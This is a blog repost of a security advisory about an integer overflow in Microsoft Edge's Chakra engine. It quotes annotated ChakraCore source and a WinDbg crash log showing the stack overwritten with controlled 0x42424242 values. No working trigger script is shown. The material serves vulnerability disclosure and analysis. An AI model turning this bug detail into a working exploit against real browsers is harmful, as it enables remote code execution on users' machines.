Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86395106

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team

There is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra!
This issue can be reproduced steadly in uptodate Edge in Win10 WIP.

//ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount;			//pnode->sxCall.argCount=0xFFFF
    argCount++; // include "this"							//overflow!!!! argCount==0

    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);

    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }

    byteCodeGenerator->StartStatement(pnode);

    // Start call, allocate out param space
    funcInfo->StartRecordingOutArgs(argCount);

    // Assign the call target operand(s), putting them into expression temps if necessary to protect
    // them from side-effects.
    if (fSideEffectArgs)
    {
        SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);
    }

    if (pnode->sxCall.pnodeTarget->nop == knopSuper)
    {
        EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator);
    }

    Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true);

    if (pnode->sxCall.pnodeArgs == nullptr)
    {
        funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
        Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo)
            && CallTargetIsArray(pnode->sxCall.pnodeTarget))
            ? Js::OpCode::NewScObjArray : Js::OpCode::NewScObject;
        Assert(argCount == 1);

        Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
        byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode),
            pnode->sxCall.pnodeTarget->location, argCount, callSiteId);
    }
    else
    {
        byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
        uint32 actualArgCount = 0;

        if (IsCallOfConstants(pnode))
        {
            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
            actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount);
        }
        else
        {
            Js::OpCode op;
            if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)))
            {
                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray;
            }
            else
            {
                op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject;
            }

            Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);


            Js::AuxArray<uint32> *spreadIndices = nullptr;
            actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister,
                false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices);
            funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);


            if (pnode->sxCall.spreadArgCount > 0)
            {
                Assert(spreadIndices != nullptr);
                uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32);
                uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc;
                byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
                    (uint16)actualArgCount, Js::CallIExtended_SpreadArgs,
                    spreadIndices, spreadIndicesSize, callSiteId);
            }
            else
            {
                byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
                    (uint16)actualArgCount, callSiteId);
            }
        }

        Assert(argCount == actualArgCount);
    }

    // End call, pop param space
    funcInfo->EndRecordingOutArgs(argCount);
    return;
}

//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
inline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue)
{
	Assert(m_outParams + outRegisterID < m_outSp);		
	m_outParams[outRegisterID] = aValue;				//OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only 
}

//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
    Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
    {

#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
        // Support for simulating partially initialized interpreter stack frame.
        InterpreterThunkStackCountTracker tracker;

        if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) &&
            CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount())
        {
            switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType))
            {
            case 0:
                DebugBreak();
                break;
            case 1:
                Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError);
                break;
            default:
                DebugBreak();
            }
        }
#endif
        ScriptContext* functionScriptContext = function->GetScriptContext();
        ThreadContext * threadContext = functionScriptContext->GetThreadContext();
        Assert(!threadContext->IsDisableImplicitException());
        functionScriptContext->VerifyAlive(!function->IsExternal());
        Assert(threadContext->IsScriptActive());
        Assert(threadContext->IsInScript());

        FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody();
#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
        if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch
        {
            if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode())
            {
                Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode
            }
            else
            {
                Throw::FatalInternalError();
            }
        }
#endif

        if (executeFunction->GetInterpretedCount() == 0)
        {
            executeFunction->TraceInterpreterExecutionMode();
        }


        class AutoRestore
        {
        private:
            ThreadContext *const threadContext;
            const uint8 savedLoopDepth;

        public:
            AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction)
                : threadContext(threadContext),
                savedLoopDepth(threadContext->LoopDepth())
            {
                if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction())
                {
                    executeFunction->SetWasCalledFromLoop();
                }
            }

            ~AutoRestore()
            {
                threadContext->SetLoopDepth(savedLoopDepth);
            }
        } autoRestore(threadContext, executeFunction);

#if ENABLE_PROFILE_INFO
        DynamicProfileInfo * dynamicProfileInfo = nullptr;
        const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter ||
                               (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction));
        if (doProfile)
        {
#if !DYNAMIC_INTERPRETER_THUNK
            executeFunction->EnsureDynamicProfileInfo();
#endif
            dynamicProfileInfo = executeFunction->GetDynamicProfileInfo();
            threadContext->ClearImplicitCallFlags();
        }
#else
        const bool doProfile = false;
#endif

        executeFunction->IncreaseInterpretedCount();
#ifdef BGJIT_STATS
        functionScriptContext->interpretedCount++;
        functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount());
#endif

        AssertMsg(!executeFunction->IsDeferredParseFunction(),
            "Non-intrinsic functions must provide byte-code to execute");

        executeFunction->BeginExecution();

        bool fReleaseAlloc = false;
        InterpreterStackFrame* newInstance = nullptr;
        Var* allocation = nullptr;

        if (!isAsmJs && executeFunction->IsCoroutine())
        {
            // If the FunctionBody is a generator then this call is being made by one of the three
            // generator resuming methods: next(), throw(), or return().  They all pass the generator
            // object as the first of two arguments.  The real user arguments are obtained from the
            // generator object.  The second argument is the ResumeYieldData which is only needed
            // when resuming a generator and so it only used here if a frame already exists on the
            // generator object.
            AssertMsg(args.Info.Count == 2, "Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer");
            JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]);
            newInstance = generator->GetFrame();

            if (newInstance != nullptr)
            {
                ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]);
                newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData);

                // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so
                // give the InterpreterStackFrame a legit enough stack address to make this comparison work.
                newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator);
            }
            else
            {
                //
                // Allocate a new InterpreterStackFrame instance on the recycler heap.
                // It will live with the JavascriptGenerator object.
                //
                Arguments generatorArgs = generator->GetArguments();
                InterpreterStackFrame::Setup setup(function, generatorArgs);
                size_t varAllocCount = setup.GetAllocationVarCount();
                size_t varSizeInBytes = varAllocCount * sizeof(Var);
                DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality
                Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? executeFunction->GetLoopHeaderArrayPtr() : nullptr;

                allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var);
                AnalysisAssert(allocation);
#if DBG
                // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame
                Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var);
                AnalysisAssert(invalidVar);
                memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject));
                newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar);
#else
                newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr);
#endif

                newInstance->m_reader.Create(executeFunction);

                generator->SetFrame(newInstance, varSizeInBytes);
            }
        }
        else
        {
            InterpreterStackFrame::Setup setup(function, args);
            size_t varAllocCount = setup.GetAllocationVarCount();
            size_t varSizeInBytes = varAllocCount * sizeof(Var);

            //
            // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
            //
            DWORD_PTR stackAddr;

            // If the locals area exceeds a certain limit, allocate it from a private arena rather than
            // this frame. The current limit is based on an old assert on the number of locals we would allow here.
            if (varAllocCount > InterpreterStackFrame::LocalsThreshold)
            {
                ArenaAllocator *tmpAlloc = nullptr;
                fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
                allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
                stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
            }
            else
            {
                PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
                allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
                memset(allocation, 0xFE, varSizeInBytes);
#endif
                stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
            }

            /*
            * If the function has any loop headers, we allocate an array for the loop headers wrappers, and
            * reference the wrappers in the array. We then push the pointer to the array onto the stack itself.
            * We do this so that while the function is being interpreted, we don't want the jitted loop
            * bodies to be collected, even if the loop body isn't being executed. The loop body will
            * get collected when the function has been JITted, and when the function exits the interpreter.
            * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but
            * it's cheaper to just copy them all into the recycler array rather than just the ones that
            * have been jitted.
            */
            Var loopHeaderArray = nullptr;

            if (executeFunction->GetHasAllocatedLoopHeaders())
            {
                // Loop header array is recycler allocated, so we push it on the stack
                // When we scan the stack, we'll recognize it as a recycler allocated
                // object, and mark it's contents and keep the individual loop header
                // wrappers alive
                loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr();
            }

#if DBG
            Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject));
            memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject));
            newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar);
#else
            newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr);
#endif

            newInstance->m_reader.Create(executeFunction);
        }
        //
        // Execute the function's byte-code, returning the return-value:
        // - Mark that the function is current executing and may not be modified.
        //

#if ENABLE_TTD
        TTD::TTDExceptionFramePopper exceptionFramePopper;
        if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
        {
            bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock);

            threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally);
            exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function);
        }
#endif

        Var aReturn = nullptr;

        {
            if (!isAsmJs && executeFunction->IsInDebugMode())
            {
#if DYNAMIC_INTERPRETER_THUNK
                PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
                aReturn = newInstance->DebugProcess();
#else
                aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
#endif
            }
            else
            {
#if DYNAMIC_INTERPRETER_THUNK
                PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
                aReturn = newInstance->Process();
#else
                aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
#endif
            }
        }

        executeFunction->EndExecution();

#if ENABLE_TTD
        if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
        {
            exceptionFramePopper.PopInfo();
            threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn);
        }
#endif

        if (fReleaseAlloc)
        {
            functionScriptContext->ReleaseInterpreterArena();
        }

#if ENABLE_PROFILE_INFO
        if (doProfile)
        {
            dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags());
        }
#endif

        if (isAsmJs)
        {
            return newInstance;
        }
        return aReturn;
    }

	
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffe`a1ea0000 00007ffe`a207b000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000   C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffe`9e590000 00007ffe`9e7d9000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffe`9c900000 00007ffe`9c97e000   C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000   C:\Windows\System32\combase.dll
ModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000   C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffe`a0d00000 00007ffe`a0e25000   C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000   C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffe`a0c50000 00007ffe`a0ced000   C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffe`98900000 00007ffe`98960000   C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000   C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffe`9e330000 00007ffe`9e341000   C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffe`7d930000 00007ffe`7dcf4000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000   C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffe`a0b90000 00007ffe`a0c31000   C:\Windows\System32\advapi32.dll
ModLoad: 00007ffe`9f400000 00007ffe`9f459000   C:\Windows\System32\sechost.dll
ModLoad: 00007ffe`96080000 00007ffe`96306000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffe`a13b0000 00007ffe`a1401000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffe`a0e30000 00007ffe`a0eda000   C:\Windows\System32\shcore.dll
ModLoad: 00007ffe`9f460000 00007ffe`9f487000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000   C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffe`a1c90000 00007ffe`a1dda000   C:\Windows\System32\USER32.dll
ModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffe`9e370000 00007ffe`9e3bc000   C:\Windows\System32\powrprof.dll
ModLoad: 00007ffe`9e310000 00007ffe`9e325000   C:\Windows\System32\profapi.dll
ModLoad: 00007ffe`9e210000 00007ffe`9e239000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffe`8d040000 00007ffe`8d066000   C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffe`9d610000 00007ffe`9d641000   C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffe`9dd60000 00007ffe`9dd77000   C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffe`9d9a0000 00007ffe`9da44000   C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffe`a18b0000 00007ffe`a191c000   C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffe`a0b20000 00007ffe`a0b28000   C:\Windows\System32\NSI.dll
ModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000   C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffe`9d960000 00007ffe`9d997000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000   C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffe`9e1e0000 00007ffe`9e205000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffe`9d440000 00007ffe`9d461000   C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffe`8c940000 00007ffe`8c9b4000   C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffe`983e0000 00007ffe`98402000   C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffe`90b10000 00007ffe`90b2b000   C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffe`a1920000 00007ffe`a1a65000   C:\Windows\System32\ole32.dll
ModLoad: 00007ffe`9cab0000 00007ffe`9cb45000   C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffe`8b6f0000 00007ffe`8b791000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffe`81fa0000 00007ffe`83651000   C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffe`9a690000 00007ffe`9a7c9000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffe`915c0000 00007ffe`915ff000   C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffe`80f50000 00007ffe`8173a000   C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffe`9afe0000 00007ffe`9b056000   C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffe`9af20000 00007ffe`9afaf000   C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffe`9b2d0000 00007ffe`9b466000   C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffe`88e90000 00007ffe`88f5b000   C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffe`98590000 00007ffe`98696000   C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffe`98500000 00007ffe`98582000   C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffe`99ad0000 00007ffe`99da2000   C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000   C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffe`9ae40000 00007ffe`9ae55000   C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffe`98f20000 00007ffe`99451000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffe`9b470000 00007ffe`9b49a000   C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffe`9f490000 00007ffe`a08c7000   C:\Windows\System32\shell32.dll
ModLoad: 00007ffe`9ec30000 00007ffe`9ec79000   C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffe`a08d0000 00007ffe`a0a36000   C:\Windows\System32\msctf.dll
ModLoad: 00007ffe`98700000 00007ffe`98802000   C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffe`8d070000 00007ffe`8d39e000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffe`9e240000 00007ffe`9e270000   C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffe`98860000 00007ffe`988c9000   C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000   C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffe`8d800000 00007ffe`8d81b000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffe`963d0000 00007ffe`964a7000   C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000   C:\Windows\system32\mswsock.dll
ModLoad: 00007ffe`9a290000 00007ffe`9a29b000   C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffe`957f0000 00007ffe`959b8000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffe`7fed0000 00007ffe`8005a000   C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffe`999d0000 00007ffe`999ed000   C:\Windows\System32\rmclient.dll
ModLoad: 00007ffe`89aa0000 00007ffe`89ab8000   C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffe`8a860000 00007ffe`8a8a7000   C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000   C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffe`9b940000 00007ffe`9bc1f000   C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffe`9d180000 00007ffe`9d224000   C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffe`8bb90000 00007ffe`8bc12000   C:\Windows\system32\twinapi.dll
ModLoad: 00007ffe`84db0000 00007ffe`84e2a000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ffe`81c30000 00007ffe`81c58000   C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffe`9e3c0000 00007ffe`9e589000   C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffe`9e350000 00007ffe`9e361000   C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffe`846e0000 00007ffe`8473a000   C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000   C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000   C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffe`943a0000 00007ffe`94660000   C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffe`81910000 00007ffe`8191f000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffe`99510000 00007ffe`99552000   C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffe`994a0000 00007ffe`99507000   C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000   C:\Windows\System32\oleacc.dll
ModLoad: 00007ffe`81bf0000 00007ffe`81c00000   C:\Windows\system32\msimtf.dll
ModLoad: 00007ffe`940f0000 00007ffe`94178000   C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffe`98170000 00007ffe`98184000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffe`81bb0000 00007ffe`81be8000   C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffe`94210000 00007ffe`94398000   C:\Windows\SYSTEM32\windows.globalization.dll
ModLoad: 00007ffe`8b520000 00007ffe`8b6e5000   C:\Windows\System32\uiautomationcore.dll
(1590.5d8): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffe`a1f48d70 cc              int     3
0:035> g
onecoreuap\inetcore\urlmon\zones\zoneidentifier.cxx(359)\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 œµÕ≥’“≤ªµΩ÷∏∂®µƒŒƒº˛°£
(1590.b70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ffe`8133ba8d 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????
0:016> r
rax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98
rdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025
rip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00
 r8=000000d8b83f9d20  r9=000002aa8688fe00 r10=000002aa86879760
r11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270
r14=0000000000000000 r15=000002aa98205cc2
iopl=0         nv up ei pl nz ac pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010212
chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d:
00007ffe`8133ba8d 488904d1        mov     qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=????????????????
0:016> dq ecx
000000d8`b83f9e98  00000000`00000030 000002aa`86879760
000000d8`b83f9ea8  00010000`42424242 00010000`42424242
000000d8`b83f9eb8  00010000`42424242 00010000`42424242
000000d8`b83f9ec8  00010000`42424242 00010000`42424242
000000d8`b83f9ed8  00010000`42424242 00010000`42424242
000000d8`b83f9ee8  00010000`42424242 00010000`42424242
000000d8`b83f9ef8  00010000`42424242 00010000`42424242
000000d8`b83f9f08  00010000`42424242 00010000`42424242
0:016> dq [ecx+edx*8]
000000d8`b8400000  ????????`???????? ????????`????????
000000d8`b8400010  ????????`???????? ????????`????????
000000d8`b8400020  ????????`???????? ????????`????????
000000d8`b8400030  ????????`???????? ????????`????????
000000d8`b8400040  ????????`???????? ????????`????????
000000d8`b8400050  ????????`???????? ????????`????????
000000d8`b8400060  ????????`???????? ????????`????????
000000d8`b8400070  ????????`???????? ????????`????????
0:016> !address 000000d8`b8400000 

                                     
Usage:                  
Allocation Base:        000000d8`b8400000
Base Address:           000000d8`b8400000
End Address:            000000d8`b84fc000
Region Size:            00000000`000fc000
Type:                   00020000	MEM_PRIVATE
State:                  00002000	MEM_RESERVE
Protect:                00000000	
More info:              ~17k

0:016> !address ecx
Usage:                  Stack
Allocation Base:        000000d8`b7a00000
Base Address:           000000d8`b83f4000
End Address:            000000d8`b8400000
Region Size:            00000000`0000c000
Type:                   00020000	MEM_PRIVATE
State:                  00001000	MEM_COMMIT
Protect:                00000004	PAGE_READWRITE
More info:              ~16k

0:016> kb
RetAddr           : Args to Child                                                           : Call Site
00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
